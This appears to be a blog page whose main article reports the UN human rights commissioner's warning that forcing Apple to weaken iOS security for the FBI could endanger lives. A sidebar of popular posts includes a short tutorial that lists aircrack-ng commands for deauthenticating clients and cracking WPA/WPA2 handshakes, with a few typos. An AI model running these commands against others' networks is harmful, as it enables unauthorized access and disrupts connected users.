Skip to main content

FBI forcing Apple to weaken iOS security could endanger lives, warns UN


The legal tussle between Apple and the FBI over a locked iPhone, and the security weakening measures the security services want the iOS maker to take to help it extract data on the device, has now attracted comment from the UN’s commissioner for human rights.
Representatives for both sides of the Apple vs FBI argument were called to Congress earlier this week to give testimony in a hearing entitled “The Encryption Tightrope: Balancing Americans’ Security and Privacy” — which has led to some bizarre claims from the pro-unlocking camp as they seek to justify forcing Apple to create a less secure version of iOS.
Weighing into the debate today on Apple’s side of the argument, with a robust public statement in support of encryption, the UN’s Zeid Ra’ad Al Hussein argues that privacy is a pre-requisite for security, and calls for clear red lines to protect personal data in the digital age.
The outcome of the Apple vs FBI case could have negative ramifications for the humans rights of people across the world if the FBI prevails in forcing Apple to weaken the security of iOS, he writes, warning that such a step could be “a gift to authoritarian regimes”.
“In order to address a security-related issue related to encryption in one case, the authorities risk unlocking a Pandora’s Box that could have extremely damaging implications for the human rights of many millions of people, including their physical and financial security,” says Al Hussein.
“I recognize this case is far from reaching a conclusion in the US courts, and urge all concerned to look not just at the merits of the case itself but also at its potential wider impact.”
The commissioner argues the case boils down to determining “where a key red line necessary to safeguard all of us from criminals and repression should be set” — countering the notion it is merely about unlocking one iPhone used in a terrorist incident, as the US government has tried to suggest.
“There are many ways to investigate whether or not these killers had accomplices besides forcing Apple to create software to undermine the security features of their own phones,” he writes of the San Bernardino terrorists, one of whom used the phone in question as a work device. “This is not just about one case and one IT company in one country. It will have tremendous ramifications for the future of individuals’ security in a digital world which is increasingly inextricably meshed with the actual world we live in.
It is neither fanciful nor an exaggeration to say that, without encryption tools, lives may be endangered.
“A successful case against Apple in the US will set a precedent that may make it impossible for Apple or any other major international IT company to safeguard their clients’ privacy anywhere in the world. It is potentially a gift to authoritarian regimes, as well as to criminal hackers. There have already been a number of concerted efforts by authorities in other States to force IT and communications companies such as Google and Blackberry to expose their customers to mass surveillance.”
The commissioner goes on to flag up the widespread global use of encryption tools — such as by political dissidents, journalists and human rights defenders — arguing that encryption and anonymity are vital “enablers of both freedom of expression and opinion, and the right to privacy”.
“It is neither fanciful nor an exaggeration to say that, without encryption tools, lives may be endangered. In the worst cases, a Government’s ability to break into its citizens’ phones may lead to the persecution of individuals who are simply exercising their fundamental human rights,” he continues, adding: “There is, unfortunately, no shortage of security forces around the world who will take advantage of the ability to break into people’s phones if they can.
“And there is no shortage of criminals intent on committing economic crimes by accessing other people’s data. Personal contacts and calendars, financial information and health data, and many other rightfully private information need to be protected from criminals, hackers and unscrupulous governments who may use them against people for the wrong reasons. In an age when we store so much of our personal and professional lives on our smart phones and other devices, how is it going to be possible to protect that information without fail-safe encryption systems?”
Al Hussein concludes that the core of the issue is a question of proportionality, arguing that the security services’ hope to gain extra information about one “dreadful crime” must be weighed against the risk of “enabling a multitude of other crimes all across the world”.
“The debate around encryption is too focused on one side of the security coin, in particular its potential use for criminal purposes in times of terrorism. The other side of the security coin, is that weakening encryption protections may bring even bigger dangers to national and international security,” he adds.

Comments

Popular posts from this blog

Building a smarter home

The Jetsons  presented a highly entertaining vision of what  homes  of the future would  look like . The animated television show anticipated a world where humans would be able to do everything with just the push of a button. In many ways, the show turned out to be prophetic; today we have printable food, video chats, smartwatches and robots that help with housework — and flying cars may even be on the way. The challenge for companies is to integrate digital technologies in meaningful ways that enhance people’s  homes  and improve their lives. Many of the innovations to emerge over the past few years have been geared toward this kind of “push-button living.” Thanks to the rise of smartphones and the proliferation of cheap sensors, it is possible to make just about any household appliance “smart” and “connected.” By 2019,  companies are expected to ship 1.9 billion connected home devices, bringing in about $490 billion in revenue. ...

Crack WPA & WPA2 with Aircrack-ng on Kali Linux

In this tutorial we are going to teach you How to crack WPA & WPA 2 with aircrack-ng on Kali Linux. We high recommend this for research or educational purpose only. Things we used for cracking WPA & WPA2: Alfa AWUSO36H Wireless Card Windows 7-64bit (works on 32bit) VMware Workstation Kali Linux 2.0 Command to crack WPA & WPA2: airmon-ng  sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor sudo ifconfig wlan0 up airodump-ng wlan0  airodump-ng -c [channel id] --write [any name] --bssid [bssid of the wifi] wlan0 aireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0 aircrack-ng -w [wordlist file] -b [bssid] [any name]-01.cap sudo ifconfig wlan0 down sudo iwcofnig wlan0 mode monitor sudo ifconfig wlan0 up  Here is a YouTube video on How to crack WPA and WPA2 with Aircrack-ng on Kali Linux: In the about tutorial we EVER hack our own systems as a proof of concept and never engage in any black hat activity.

Facebook ‘Class Action’ Privacy Lawsuit Moves To Austrian Supreme Court

A privacy lawsuit filed against Facebook last year by Viennese lawyer and data privacy activist Max Schrems has moved up to Austria’s Supreme Court which will rule on whether the suit can be treated as a class action. When Schrems kicked off the suit, back in July 2014, he invited adult non-commercial Facebook users located anywhere outside the U.S. and Canada to join the suit for free — and tens of thousands of people quickly took up the invitation. The legal action focuses on multiple areas where the plaintiffs argue Facebook has been violating EU data protection laws, such as the absence of effective consent to many types of data use; the tracking of Internet users through external websites; and the monitoring and analysis of users via big data systems. Facebook’s participation in the NSA’s PRISM surveillance program is also part of the complaint. In July the case suffered a setback when an Austrian regional co...

How ad-free subscriptions could solve Facebook

At the core of Facebook’s “well-being” problem is that its business is directly coupled with total time spent on its apps. The more hours you pass on the social network, the more ads you see and click, the more money it earns. That puts its plan to make using Facebook healthier at odds with its finances, restricting how far it’s willing to go to protect us from the harms of over use. The advertising-supported model comes with some big benefits, though. Facebook CEO Mark Zuckerberg has repeatedly said that “We will always keep Facebook a free service for everyone.” Ads lets Facebook remain free for those who don’t want to pay, and more importantly, for those around the world who couldn’t afford to. Ads pay for Facebook to keep the lights on, research and develop new technologies, and profit handsomely in a way that attracts top talent and further investment. More affluent users with more buying power in markets like the US, UK, and Canada command higher ad prices, effectively...

eGym raises $45M Series C for cloud-connected gym equipment and fitness software

eGym , the Munich-based startup that offers cloud-connected gym equipment and supporting cloud software and app for the fitness training floor, has closed $45 million in Series C funding. The round was led by new investor HPE Growth Capital, while existing investors, including Highland Europe, also participated. The problem that eGym is looking to solve is that, whilst gyms have moved from a bodybuilder market to a mass market in the last 20 years, the technology in gyms lags behind. That’s despite the fact that better use of technology can help to reduce customer churn, the biggest pain-point of both gym operator and gym users. Comprising of an app for both gym user and trainer, combined with the company’s connected strength machines, the eGym Cloud makes it possible for gym members to receive better fitness instruction and an evolving and personalised fitness plan based on data collected as they workout. And by providing a better workout feedback loop, gym goers can get an i...